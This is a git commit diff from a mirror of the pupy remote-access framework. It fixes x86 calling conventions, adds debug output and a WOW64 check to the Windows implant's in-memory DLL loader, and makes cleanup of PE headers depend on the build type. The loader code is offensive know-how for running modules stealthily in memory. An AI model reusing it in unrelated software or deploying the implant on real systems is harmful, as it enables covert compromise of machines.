mirror of https://github.com/n1nj4sec/pupy.git
[Experemental] client/windows: Fix x86-related issues
This commit is contained in:
Oleksii Shevchuk
parent
8d7b168889
commit
7f40611cbf
|
|
@ -153,8 +153,9 @@ BOOL initialize_python(int argc, char *argv[], BOOL is_shared_object) {
|
||||||
|
|
||||||
Py_IncRef(py_argv);
|
Py_IncRef(py_argv);
|
||||||
|
|
||||||
for (i = 0; i<argc; i++)
|
for (i = 0; i<argc && argv[i]; i++) {
|
||||||
PyList_Append(py_argv, PyString_FromString(argv[i]));
|
PyList_Append(py_argv, PyString_FromString(argv[i]));
|
||||||
|
}
|
||||||
|
|
||||||
PySys_SetObject("executable", PyString_FromString(OSGetProgramName()));
|
PySys_SetObject("executable", PyString_FromString(OSGetProgramName()));
|
||||||
PySys_SetObject("argv", py_argv);
|
PySys_SetObject("argv", py_argv);
|
||||||
|
|
@ -163,6 +164,7 @@ BOOL initialize_python(int argc, char *argv[], BOOL is_shared_object) {
|
||||||
|
|
||||||
setup_jvm_class();
|
setup_jvm_class();
|
||||||
|
|
||||||
|
dprint("Python initialized\n");
|
||||||
return TRUE;
|
return TRUE;
|
||||||
|
|
||||||
lbExit1:
|
lbExit1:
|
||||||
|
|
@ -191,7 +193,6 @@ void run_pupy() {
|
||||||
char *pupy_init_bytecode_c;
|
char *pupy_init_bytecode_c;
|
||||||
Py_ssize_t pupy_init_bytecode_c_size;
|
Py_ssize_t pupy_init_bytecode_c_size;
|
||||||
|
|
||||||
|
|
||||||
dprint("Load config\n");
|
dprint("Load config\n");
|
||||||
len.c[3] = __config__[0];
|
len.c[3] = __config__[0];
|
||||||
len.c[2] = __config__[1];
|
len.c[2] = __config__[1];
|
||||||
|
|
|
||||||
|
|
@ -195,9 +195,14 @@ FinalizeSection(PMEMORYMODULE module, PSECTIONFINALIZEDATA sectionData) {
|
||||||
if (sectionData->address == sectionData->alignedAddress &&
|
if (sectionData->address == sectionData->alignedAddress &&
|
||||||
(sectionData->last ||
|
(sectionData->last ||
|
||||||
module->headers->OptionalHeader.SectionAlignment == module->pageSize ||
|
module->headers->OptionalHeader.SectionAlignment == module->pageSize ||
|
||||||
(sectionData->size % module->pageSize) == 0)
|
(sectionData->size % module->pageSize) == 0))
|
||||||
) {
|
{
|
||||||
// Only allowed to decommit whole pages
|
// Only allowed to decommit whole pages
|
||||||
|
dprint(
|
||||||
|
"VirtualFree: %p - %p (%lu)\n",
|
||||||
|
sectionData->address, (PCHAR) sectionData->address + sectionData->size, sectionData->size
|
||||||
|
);
|
||||||
|
|
||||||
VirtualFree(sectionData->address, sectionData->size, MEM_DECOMMIT);
|
VirtualFree(sectionData->address, sectionData->size, MEM_DECOMMIT);
|
||||||
}
|
}
|
||||||
return TRUE;
|
return TRUE;
|
||||||
|
|
@ -213,6 +218,10 @@ FinalizeSection(PMEMORYMODULE module, PSECTIONFINALIZEDATA sectionData) {
|
||||||
}
|
}
|
||||||
|
|
||||||
// change memory access flags
|
// change memory access flags
|
||||||
|
dprint(
|
||||||
|
"VirtualProtect: %p - %p (%lu) %08x\n",
|
||||||
|
sectionData->address, (PCHAR) sectionData->address + sectionData->size, sectionData->size, protect
|
||||||
|
);
|
||||||
if (VirtualProtect(sectionData->address, sectionData->size, protect, &oldProtect) == 0) {
|
if (VirtualProtect(sectionData->address, sectionData->size, protect, &oldProtect) == 0) {
|
||||||
#ifdef DEBUG_OUTPUT
|
#ifdef DEBUG_OUTPUT
|
||||||
OutputLastError("Error protecting memory page");
|
OutputLastError("Error protecting memory page");
|
||||||
|
|
@ -285,7 +294,8 @@ ExecuteTLS(PMEMORYMODULE module)
|
||||||
PIMAGE_TLS_DIRECTORY tls;
|
PIMAGE_TLS_DIRECTORY tls;
|
||||||
PIMAGE_TLS_CALLBACK* callback;
|
PIMAGE_TLS_CALLBACK* callback;
|
||||||
|
|
||||||
PIMAGE_DATA_DIRECTORY directory = GET_HEADER_DICTIONARY(module, IMAGE_DIRECTORY_ENTRY_TLS);
|
PIMAGE_DATA_DIRECTORY directory = GET_HEADER_DICTIONARY(
|
||||||
|
module, IMAGE_DIRECTORY_ENTRY_TLS);
|
||||||
if (directory->VirtualAddress == 0) {
|
if (directory->VirtualAddress == 0) {
|
||||||
return TRUE;
|
return TRUE;
|
||||||
}
|
}
|
||||||
|
|
@ -294,6 +304,7 @@ ExecuteTLS(PMEMORYMODULE module)
|
||||||
callback = (PIMAGE_TLS_CALLBACK *) tls->AddressOfCallBacks;
|
callback = (PIMAGE_TLS_CALLBACK *) tls->AddressOfCallBacks;
|
||||||
if (callback) {
|
if (callback) {
|
||||||
while (*callback) {
|
while (*callback) {
|
||||||
|
dprint("Call TLS Callback %p\n", callback);
|
||||||
(*callback)((LPVOID) codeBase, DLL_PROCESS_ATTACH, NULL);
|
(*callback)((LPVOID) codeBase, DLL_PROCESS_ATTACH, NULL);
|
||||||
callback++;
|
callback++;
|
||||||
}
|
}
|
||||||
|
|
@ -809,10 +820,12 @@ HMEMORYMODULE MemoryLoadLibraryEx(
|
||||||
|
|
||||||
dprint("MemoryLoadLibraryEx: Library loaded\n");
|
dprint("MemoryLoadLibraryEx: Library loaded\n");
|
||||||
|
|
||||||
|
#ifndef DEBUG
|
||||||
// Cleanup PE headers
|
// Cleanup PE headers
|
||||||
CleanupHeaders(result);
|
CleanupHeaders(result);
|
||||||
|
|
||||||
dprint("MemoryLoadLibraryEx: headers cleaned up\n");
|
dprint("MemoryLoadLibraryEx: headers cleaned up\n");
|
||||||
|
#endif
|
||||||
|
|
||||||
return (HMEMORYMODULE)result;
|
return (HMEMORYMODULE)result;
|
||||||
|
|
||||||
|
|
|
||||||
|
|
@ -39,14 +39,14 @@ typedef void *HCUSTOMMODULE;
|
||||||
extern "C" {
|
extern "C" {
|
||||||
#endif
|
#endif
|
||||||
|
|
||||||
typedef HMODULE (*CustomGetModuleHandleA)(LPCSTR);
|
typedef HMODULE (CALLBACK *CustomGetModuleHandleA)(LPCSTR);
|
||||||
typedef HMODULE (*CustomGetModuleHandleW)(LPCWSTR);
|
typedef HMODULE (CALLBACK *CustomGetModuleHandleW)(LPCWSTR);
|
||||||
typedef HMODULE (*CustomLoadLibraryExA)(LPCSTR, HANDLE, DWORD);
|
typedef HMODULE (CALLBACK *CustomLoadLibraryExA)(LPCSTR, HANDLE, DWORD);
|
||||||
typedef HMODULE (*CustomLoadLibraryExW)(LPCWSTR, HANDLE, DWORD);
|
typedef HMODULE (CALLBACK *CustomLoadLibraryExW)(LPCWSTR, HANDLE, DWORD);
|
||||||
typedef HCUSTOMMODULE (*CustomLoadLibraryW)(LPCWSTR);
|
typedef HCUSTOMMODULE (CALLBACK *CustomLoadLibraryW)(LPCWSTR);
|
||||||
typedef HCUSTOMMODULE (*CustomLoadLibraryA)(LPCSTR);
|
typedef HCUSTOMMODULE (CALLBACK *CustomLoadLibraryA)(LPCSTR);
|
||||||
typedef FARPROC (*CustomGetProcAddress)(HCUSTOMMODULE, LPCSTR);
|
typedef FARPROC (CALLBACK *CustomGetProcAddress)(HCUSTOMMODULE, LPCSTR);
|
||||||
typedef void (*CustomFreeLibraryFunc)(HCUSTOMMODULE);
|
typedef void (CALLBACK *CustomFreeLibraryFunc)(HCUSTOMMODULE);
|
||||||
|
|
||||||
/**
|
/**
|
||||||
* Load EXE/DLL from memory location.
|
* Load EXE/DLL from memory location.
|
||||||
|
|
@ -85,14 +85,6 @@ FARPROC MemoryGetProcAddress(HMEMORYMODULE, LPCSTR);
|
||||||
*/
|
*/
|
||||||
void MemoryFreeLibrary(HMEMORYMODULE);
|
void MemoryFreeLibrary(HMEMORYMODULE);
|
||||||
|
|
||||||
HMODULE MyGetModuleHandleA(LPCSTR name);
|
|
||||||
HMODULE MyGetModuleHandleW(LPCWSTR name);
|
|
||||||
HMODULE MyLoadLibraryA(LPCSTR name);
|
|
||||||
HMODULE MyLoadLibraryW(LPCWSTR name);
|
|
||||||
|
|
||||||
HMODULE MyLoadLibraryExA(LPCSTR lpLibFileName, HANDLE hFile, DWORD dwFlags);
|
|
||||||
HMODULE MyLoadLibraryExW(LPCWSTR lpLibFileName, HANDLE hFile, DWORD dwFlags);
|
|
||||||
|
|
||||||
#ifdef __cplusplus
|
#ifdef __cplusplus
|
||||||
}
|
}
|
||||||
#endif
|
#endif
|
||||||
|
|
|
||||||
|
|
@ -252,7 +252,7 @@ static PHCUSTOMLIBRARY _AddMemoryModule(
|
||||||
/****************************************************************
|
/****************************************************************
|
||||||
* Public functions
|
* Public functions
|
||||||
*/
|
*/
|
||||||
HMODULE MyGetModuleHandleA(LPCSTR name)
|
HMODULE CALLBACK MyGetModuleHandleA(LPCSTR name)
|
||||||
{
|
{
|
||||||
PHCUSTOMLIBRARY lib;
|
PHCUSTOMLIBRARY lib;
|
||||||
|
|
||||||
|
|
@ -331,7 +331,8 @@ BOOL _CreateModuleMapping(HMODULE hModule, HANDLE *phMapping, PVOID *ppvMem)
|
||||||
return TRUE;
|
return TRUE;
|
||||||
}
|
}
|
||||||
|
|
||||||
HMODULE MyLoadLibraryEx(LPCSTR name, void *bytes, void *dllmainArg, BOOL blPrivate)
|
HMODULE
|
||||||
|
MyLoadLibraryEx(LPCSTR name, void *bytes, void *dllmainArg, BOOL blPrivate)
|
||||||
{
|
{
|
||||||
HMODULE hLoadedModule = NULL;
|
HMODULE hLoadedModule = NULL;
|
||||||
|
|
||||||
|
|
@ -402,7 +403,7 @@ HMODULE MyLoadLibraryEx(LPCSTR name, void *bytes, void *dllmainArg, BOOL blPriva
|
||||||
return LoadLibrary(name);
|
return LoadLibrary(name);
|
||||||
}
|
}
|
||||||
|
|
||||||
HMODULE MyGetModuleHandleW(LPCWSTR name) {
|
HMODULE CALLBACK MyGetModuleHandleW(LPCWSTR name) {
|
||||||
PSTR pszName = NULL;
|
PSTR pszName = NULL;
|
||||||
HMODULE hResult = NULL;
|
HMODULE hResult = NULL;
|
||||||
DWORD dwRequiredSize = WideCharToMultiByte(
|
DWORD dwRequiredSize = WideCharToMultiByte(
|
||||||
|
|
@ -435,7 +436,7 @@ HMODULE MyGetModuleHandleW(LPCWSTR name) {
|
||||||
return GetModuleHandleW(name);
|
return GetModuleHandleW(name);
|
||||||
}
|
}
|
||||||
|
|
||||||
HMODULE MyLoadLibraryExA(LPCSTR name, HANDLE hFile, DWORD dwFlags) {
|
HMODULE CALLBACK MyLoadLibraryExA(LPCSTR name, HANDLE hFile, DWORD dwFlags) {
|
||||||
HMODULE hModule = MyGetModuleHandleA(name);
|
HMODULE hModule = MyGetModuleHandleA(name);
|
||||||
if (hModule)
|
if (hModule)
|
||||||
return hModule;
|
return hModule;
|
||||||
|
|
@ -443,7 +444,7 @@ HMODULE MyLoadLibraryExA(LPCSTR name, HANDLE hFile, DWORD dwFlags) {
|
||||||
return LoadLibraryExA(name, hFile, dwFlags);
|
return LoadLibraryExA(name, hFile, dwFlags);
|
||||||
}
|
}
|
||||||
|
|
||||||
HMODULE MyLoadLibraryExW(LPCWSTR name, HANDLE hFile, DWORD dwFlags) {
|
HMODULE CALLBACK MyLoadLibraryExW(LPCWSTR name, HANDLE hFile, DWORD dwFlags) {
|
||||||
HMODULE hModule = MyGetModuleHandleW(name);
|
HMODULE hModule = MyGetModuleHandleW(name);
|
||||||
if (hModule)
|
if (hModule)
|
||||||
return hModule;
|
return hModule;
|
||||||
|
|
@ -451,7 +452,7 @@ HMODULE MyLoadLibraryExW(LPCWSTR name, HANDLE hFile, DWORD dwFlags) {
|
||||||
return LoadLibraryExW(name, hFile, dwFlags);
|
return LoadLibraryExW(name, hFile, dwFlags);
|
||||||
}
|
}
|
||||||
|
|
||||||
HMODULE MyLoadLibraryA(LPCSTR name) {
|
HMODULE CALLBACK MyLoadLibraryA(LPCSTR name) {
|
||||||
HMODULE hModule = MyGetModuleHandleA(name);
|
HMODULE hModule = MyGetModuleHandleA(name);
|
||||||
if (hModule)
|
if (hModule)
|
||||||
return hModule;
|
return hModule;
|
||||||
|
|
@ -459,7 +460,7 @@ HMODULE MyLoadLibraryA(LPCSTR name) {
|
||||||
return LoadLibraryA(name);
|
return LoadLibraryA(name);
|
||||||
}
|
}
|
||||||
|
|
||||||
HMODULE MyLoadLibraryW(LPCWSTR name) {
|
HMODULE CALLBACK MyLoadLibraryW(LPCWSTR name) {
|
||||||
HMODULE hModule = MyGetModuleHandleW(name);
|
HMODULE hModule = MyGetModuleHandleW(name);
|
||||||
if (hModule)
|
if (hModule)
|
||||||
return hModule;
|
return hModule;
|
||||||
|
|
@ -467,7 +468,7 @@ HMODULE MyLoadLibraryW(LPCWSTR name) {
|
||||||
return LoadLibraryW(name);
|
return LoadLibraryW(name);
|
||||||
}
|
}
|
||||||
|
|
||||||
BOOL MyFreeLibrary(HMODULE module)
|
BOOL CALLBACK MyFreeLibrary(HMODULE module)
|
||||||
{
|
{
|
||||||
PHCUSTOMLIBRARY lib = _FindMemoryModule(NULL, module);
|
PHCUSTOMLIBRARY lib = _FindMemoryModule(NULL, module);
|
||||||
if (lib) {
|
if (lib) {
|
||||||
|
|
@ -540,7 +541,7 @@ BOOL isAllowedSymbol(PHCUSTOMLIBRARY lib, LPCSTR procname) {
|
||||||
return FALSE;
|
return FALSE;
|
||||||
}
|
}
|
||||||
|
|
||||||
FARPROC MyGetProcAddress(HMODULE module, LPCSTR procname)
|
FARPROC CALLBACK MyGetProcAddress(HMODULE module, LPCSTR procname)
|
||||||
{
|
{
|
||||||
PHCUSTOMLIBRARY lib;
|
PHCUSTOMLIBRARY lib;
|
||||||
FARPROC fpFunc = NULL;
|
FARPROC fpFunc = NULL;
|
||||||
|
|
|
||||||
|
|
@ -3,16 +3,22 @@
|
||||||
|
|
||||||
#include <windows.h>
|
#include <windows.h>
|
||||||
|
|
||||||
|
#ifndef CALLBACK
|
||||||
|
#define CALLBACK WINAPI
|
||||||
|
#endif
|
||||||
|
|
||||||
HMODULE MyLoadLibrary(LPCSTR, void *, void *);
|
HMODULE MyLoadLibrary(LPCSTR, void *, void *);
|
||||||
HMODULE MyLoadLibraryEx(LPCSTR, void *, void *, BOOL);
|
HMODULE MyLoadLibraryEx(LPCSTR, void *, void *, BOOL);
|
||||||
|
|
||||||
HMODULE MyGetModuleHandle(LPCSTR);
|
HMODULE CALLBACK MyLoadLibraryA(LPCSTR);
|
||||||
BOOL MyFreeLibrary(HMODULE);
|
HMODULE CALLBACK MyLoadLibraryW(LPCWSTR);
|
||||||
|
HMODULE CALLBACK MyLoadLibraryExA(LPCSTR name, HANDLE hFile, DWORD dwFlags);
|
||||||
|
HMODULE CALLBACK MyLoadLibraryExW(LPCWSTR name, HANDLE hFile, DWORD dwFlags);
|
||||||
|
HMODULE CALLBACK MyGetModuleHandleA(LPCSTR name);
|
||||||
|
HMODULE CALLBACK MyGetModuleHandleW(LPCWSTR name);
|
||||||
|
FARPROC CALLBACK MyGetProcAddress(HMODULE, LPCSTR);
|
||||||
|
BOOL CALLBACK MyFreeLibrary(HMODULE module);
|
||||||
|
|
||||||
HMODULE MyLoadLibraryA(LPCSTR);
|
|
||||||
HMODULE MyLoadLibraryW(LPCWSTR);
|
|
||||||
|
|
||||||
FARPROC MyGetProcAddress(HMODULE, LPCSTR);
|
|
||||||
FARPROC MyFindProcAddress(LPCSTR modulename, LPCSTR procname);
|
FARPROC MyFindProcAddress(LPCSTR modulename, LPCSTR procname);
|
||||||
|
|
||||||
VOID MySetLibraries(PVOID pLibraries);
|
VOID MySetLibraries(PVOID pLibraries);
|
||||||
|
|
|
||||||
|
|
@ -14,10 +14,10 @@
|
||||||
#define PATH_MAX 260
|
#define PATH_MAX 260
|
||||||
#endif
|
#endif
|
||||||
|
|
||||||
typedef FARPROC (*resolve_symbol_t) (HMODULE hModule, const char *name);
|
typedef FARPROC (WINAPI *resolve_symbol_t) (HMODULE hModule, const char *name);
|
||||||
|
|
||||||
static char *OSGetProgramName() {
|
static char *OSGetProgramName() {
|
||||||
static char *program_name = NULL;
|
static const char *program_name = "";
|
||||||
static BOOL is_set = FALSE;
|
static BOOL is_set = FALSE;
|
||||||
|
|
||||||
wchar_t exe[PATH_MAX];
|
wchar_t exe[PATH_MAX];
|
||||||
|
|
|
||||||
|
|
@ -166,6 +166,30 @@ static const PSTR Kernel32AllowedPrefixes[] = {
|
||||||
"Write", "Read", "Terminate", "Resume", "Virtual",
|
"Write", "Read", "Terminate", "Resume", "Virtual",
|
||||||
"Reg", NULL
|
"Reg", NULL
|
||||||
};
|
};
|
||||||
|
|
||||||
|
typedef BOOL (WINAPI *LPFN_ISWOW64PROCESS) (HANDLE, PBOOL);
|
||||||
|
LPFN_ISWOW64PROCESS fnIsWow64Process;
|
||||||
|
|
||||||
|
BOOL IsWow64()
|
||||||
|
{
|
||||||
|
#ifdef WIN_X86
|
||||||
|
BOOL bIsWow64 = TRUE;
|
||||||
|
|
||||||
|
//IsWow64Process is not available on all supported versions of Windows.
|
||||||
|
//Use GetModuleHandle to get a handle to the DLL that contains the function
|
||||||
|
//and GetProcAddress to get a pointer to the function if available.
|
||||||
|
|
||||||
|
fnIsWow64Process = (LPFN_ISWOW64PROCESS) GetProcAddress(
|
||||||
|
GetModuleHandle("kernel32"),"IsWow64Process");
|
||||||
|
|
||||||
|
if(NULL != fnIsWow64Process)
|
||||||
|
fnIsWow64Process(GetCurrentProcess(),&bIsWow64);
|
||||||
|
|
||||||
|
return bIsWow64;
|
||||||
|
#else
|
||||||
|
return FALSE;
|
||||||
|
#endif
|
||||||
|
}
|
||||||
#endif
|
#endif
|
||||||
|
|
||||||
void initialize(BOOL isDll, on_exit_session_t *cb) {
|
void initialize(BOOL isDll, on_exit_session_t *cb) {
|
||||||
|
|
@ -185,9 +209,13 @@ void initialize(BOOL isDll, on_exit_session_t *cb) {
|
||||||
dprint("TEMPLATE REV: %s\n", GIT_REVISION_HEAD);
|
dprint("TEMPLATE REV: %s\n", GIT_REVISION_HEAD);
|
||||||
|
|
||||||
#ifdef _PUPY_PRIVATE_NT
|
#ifdef _PUPY_PRIVATE_NT
|
||||||
hNtDll = GetModuleHandleA("NTDLL.DLL");
|
if (IsWow64()) {
|
||||||
hKernelBase = GetModuleHandleA("KERNELBASE.DLL");
|
dprint("WOW64 + _PUPY_PRIVATE_NT known to be broken right now\n");
|
||||||
hKernel32 = GetModuleHandleA("KERNEL32.DLL");
|
} else {
|
||||||
|
hNtDll = GetModuleHandleA("NTDLL.DLL");
|
||||||
|
hKernelBase = GetModuleHandleA("KERNELBASE.DLL");
|
||||||
|
hKernel32 = GetModuleHandleA("KERNEL32.DLL");
|
||||||
|
}
|
||||||
|
|
||||||
if (hNtDll && hKernel32 && hKernelBase) {
|
if (hNtDll && hKernel32 && hKernelBase) {
|
||||||
HMODULE hPrivate;
|
HMODULE hPrivate;
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue